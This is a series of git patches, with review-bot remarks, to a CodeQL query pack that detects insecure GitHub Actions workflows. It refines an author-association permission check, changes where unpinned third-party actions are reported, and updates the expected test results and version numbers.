.github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. | 
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index b9cf0e547ca7..181bd5673bc4 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -18,6 +18,7 @@ | .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/test13.yml:20:7:25:4 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | From db328f0b164f91338280a0b485a6ecf8df52a85d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 19 Sep 2024 18:24:08 +0200 Subject: [PATCH 512/707] Improve Association check --- .../codeql/actions/security/ControlChecks.qll | 27 ++++++++++--------- 1 file changed, 15 insertions(+), 12 deletions(-) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 650ae8d8105a..26bee3ca3a68 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll 
@@ -66,7 +66,7 @@ abstract class ControlCheck extends AstNode { } abstract class AssociationCheck extends ControlCheck { - // Checks if the actor is a COLLABORATOR of the repo + // Checks if the actor is a MEMBER/OWNER the repo // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR override predicate protectsCategoryAndEvent(string category, string event) { @@ -182,23 +182,26 @@ class RepositoryIfCheck extends RepositoryCheck instanceof If { class AssociationIfCheck extends AssociationCheck instanceof If { AssociationIfCheck() { // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) - exists( - normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.event\\.comment\\.author_association\\b", - "\\bgithub\\.event\\.issue\\.author_association\\b", - "\\bgithub\\.event\\.pull_request\\.author_association\\b", - ], _, _) - ) + normalizeExpr(this.getCondition()) + .splitAt("\n") + .regexpMatch([ + ".*\\bgithub\\.event\\.comment\\.author_association\\b.*", + ".*\\bgithub\\.event\\.issue\\.author_association\\b.*", + ".*\\bgithub\\.event\\.pull_request\\.author_association\\b.*", + ]) and + normalizeExpr(this.getCondition()).splitAt("\n").regexpMatch(".*\\bMEMBER\\b.*") and + normalizeExpr(this.getCondition()).splitAt("\n").regexpMatch(".*\\bOWNER\\b.*") } } class AssociationActionCheck extends AssociationCheck instanceof UsesStep { AssociationActionCheck() { this.getCallee() = "TheModdingInquisition/actions-team-membership" and - not exists(this.getArgument("exit")) - or - this.getArgument("exit") = "true" + ( + not exists(this.getArgument("exit")) + or + this.getArgument("exit") = "true" + ) } } From c3d7af8f59383e55202ce3b7575b05bba2861952 Mon Sep 17 00:00:00 2001 
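Review bot: The new `AssociationIfCheck` condition only requires that some line mentions `author_association`, some line mentions `MEMBER` and some line mentions `OWNER`; it does not reject weaker values in the same condition, so `contains(fromJson('["MEMBER", "OWNER", "CONTRIBUTOR"]'), github.event.comment.author_association)` is classified as an association check although `CONTRIBUTOR`, which any past contributor holds, passes it. Consider a negative match alongside the positive ones, e.g. `not normalizeExpr(this.getCondition()).splitAt("\n").regexpMatch(".*\\b(CONTRIBUTOR|FIRST_TIME_CONTRIBUTOR|FIRST_TIMER|NONE)\\b.*")` (at the cost of not recognising negated forms, which then fall on the reporting side), or at least a comment stating that the check is a keyword-presence heuristic. Since each `regexpMatch` runs over an independent `splitAt("\n")` result, the three matches may also land on unrelated lines of a multi-line `if`; whether that is acceptable depends on what `normalizeExpr` does, which is outside the hunk. The comment in the first hunk reads `MEMBER/OWNER the repo`; it should read `MEMBER/OWNER of the repo`.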
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 19 Sep 2024 18:44:23 +0200 Subject: [PATCH 513/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 285f9cfe5235..9a798b891ba4 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.45 +version: 0.1.46 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 3c02acfff199..01b36fe62cde 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.45 +version: 0.1.46 groups: [actions, queries] suites: codeql-suites extractor: javascript From c20e407c16931300a355790e14d77864cb92d593 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 20 Sep 2024 11:52:44 +0200 Subject: [PATCH 514/707] Modify UnpinnedActionsTag report node --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 6 ++ ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- .../CWE-829/UnpinnedActionsTag.expected | 62 +++++++++---------- 4 files changed, 40 insertions(+), 32 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 23832b35bd59..c83abb1ea1dd 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -264,6 +264,8 @@ class Environment extends AstNode instanceof EnvironmentImpl { abstract class Uses extends AstNode instanceof UsesImpl { string getCallee() { result = super.getCallee() } + ScalarValue getCalleeNode() { result = super.getCalleeNode() } + string getVersion() { result = super.getVersion() } int getMajorVersion() { result = super.getMajorVersion() } 
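Review bot: The new `ScalarValue getCalleeNode()` on `Uses` has no QLDoc, and neither do the abstract declaration and the two `override ScalarValueImpl getCalleeNode()` bodies in `ql/lib/codeql/actions/ast/internal/Ast.qll` in the next hunks, while the neighbouring `getVersion()` there is documented. I would add `/** Gets the scalar node holding the uses value (for example the node for actions/checkout@v2); UnpinnedActionsTag reports this location. */` on the public member and a matching line on the abstract one. The override bodies `result.getNode() = u` depend on what `u` is bound to, which is outside the hunk, so the wording should be checked against that.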
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 23b5ead7f0ef..2267c7ff694a 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1147,6 +1147,8 @@ class EnvImpl extends AstNodeImpl, TEnvNode { abstract class UsesImpl extends AstNodeImpl { abstract string getCallee(); + abstract ScalarValueImpl getCalleeNode(); + abstract string getVersion(); int getMajorVersion() { @@ -1197,6 +1199,8 @@ class UsesStepImpl extends StepImpl, UsesImpl { else result = u.getValue() } + override ScalarValueImpl getCalleeNode() { result.getNode() = u } + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } @@ -1230,6 +1234,8 @@ class ExternalJobImpl extends JobImpl, UsesImpl { u.getValue().regexpCapture(repoUsesParser(), 3) } + override ScalarValueImpl getCalleeNode() { result.getNode() = u } + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { exists(YamlString name | diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index ecdb1d065263..10c21bc368b5 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -33,6 +33,6 @@ where uses.getVersion() = version and not isTrustedOrg(repo) and not isPinnedCommit(version) -select uses, +select uses.getCalleeNode(), "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + "', not a pinned commit hash", uses, uses.toString() diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 5d38b397a428..008c36967890 100644 
--- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -1,31 +1,31 @@ -| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | -| 
.github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | -| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | -| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | -| 
.github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | -| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | -| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | -| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | -| .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'actionsdesk/lfs-warning' with ref 'v3.2', not a pinned commit hash | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ 
uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'docker/login-action' with ref 'v2', not a pinned commit hash | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'softprops/action-gh-release' with ref 'v1', not a pinned commit hash | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | -| 
.github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | -| .github/workflows/test13.yml:14:7:20:4 | Uses Step | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | -| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:19:13:19:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:23:13:23:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning21.yml:13:15:13:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning22.yml:13:15:13:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | +| 
.github/workflows/artifactpoisoning71.yml:10:15:10:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:94:15:94:39 | codecov/codecov-action@v3 | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:111:15:111:48 | peter-evans/create-pull-request@v5 | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:127:15:127:56 | thollander/actions-comment-pull-request@v2 | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:14:15:14:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:27:15:27:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| 
.github/workflows/issue_comment_3rd_party_action.yml:41:15:41:42 | eficode/resolve-pr-refs@main | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | +| .github/workflows/issue_comment_octokit.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | +| .github/workflows/issue_comment_octokit.yml:20:15:20:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:104:15:104:43 | octokit/request-action@v2.0.2 | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | +| .github/workflows/label_trusted_checkout.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout.yml:24:13:24:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/level0.yml:36:15:36:47 | 
rlespinasse/github-slug-action@v4 | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | +| .github/workflows/mend.yml:31:15:31:34 | ruby/setup-ruby@v1 | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:60:15:60:52 | amannn/action-semantic-pull-request@v5 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:109:15:109:42 | actionsdesk/lfs-warning@v3.2 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'actionsdesk/lfs-warning' with ref 'v3.2', not a pinned commit hash | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:144:15:144:43 | cachix/install-nix-action@v20 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:147:15:147:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:148:15:148:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:347:15:347:36 | docker/login-action@v2 | 
Unpinned 3rd party Action 'pr-workflow' step $@ uses 'docker/login-action' with ref 'v2', not a pinned commit hash | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:356:15:356:44 | softprops/action-gh-release@v1 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'softprops/action-gh-release' with ref 'v1', not a pinned commit hash | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:449:15:449:43 | cachix/install-nix-action@v20 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:452:15:452:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:453:15:453:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | +| .github/workflows/test7.yml:25:15:25:34 | pnpm/action-setup@v3 | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | +| .github/workflows/test13.yml:15:13:15:53 | sushichop/action-repository-permission@v2 | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | +| .github/workflows/unpinned_tags.yml:10:13:10:22 | foo/bar@v1 | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ 
uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step |
From e9dfd9ccb47779758284657133ec9a5a99938429 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 20 Sep 2024 11:54:00 +0200
Subject: [PATCH 515/707] Bump qlpack versions
---
 ql/lib/qlpack.yml | 2 +-
 ql/src/qlpack.yml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 9a798b891ba4..07221cd05bb6 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.46
+version: 0.1.47
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 01b36fe62cde..2048e94e7ec9 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.46
+version: 0.1.47
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From 116d83da5f071d6dd5f36af7a62b2f244737240a Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 20 Sep 2024 15:40:41 +0200
Subject: [PATCH 516/707] Improve reusable workflow calls
---
 .../actions/dataflow/internal/DataFlowPrivate.qll | 13 ++++++++++++-
 1 file changed, 12 insertions(+), 1 deletion(-)
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
index 0d214c63c5d1..1159ccb53ae2 100644
--- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
@@ -98,6 +98,7 @@ class DataFlowCallable instanceof Cfg::CfgScope {
 string getName() {
 if this instanceof ReusableWorkflow
 then
+ //result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath()
 result =
 this.(ReusableWorkflow)
 .getLocation()
@@ -107,7 +108,17 @@ class DataFlowCallable instanceof Cfg::CfgScope {
 .getLocation()
 .getFile()
 .getRelativePath()
- .indexOf("/.github/workflows") + 1)
+ .indexOf("/.github/workflows") + 1) or
+ result =
+ this.(ReusableWorkflow)
+ .getLocation()
+ .getFile()
+ .getRelativePath()
+ .suffix(this.(ReusableWorkflow)
+ .getLocation()
+ .getFile()
+ .getRelativePath()
+ .indexOf(".github/workflows"))
 else
 if this instanceof CompositeAction
 then
From a1e44bc918406b7a55cee9a65a054d9e62d0532e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 20 Sep 2024 15:42:19 +0200
Subject: [PATCH 517/707] Bump qlpack versions
---
 ql/lib/qlpack.yml | 2 +-
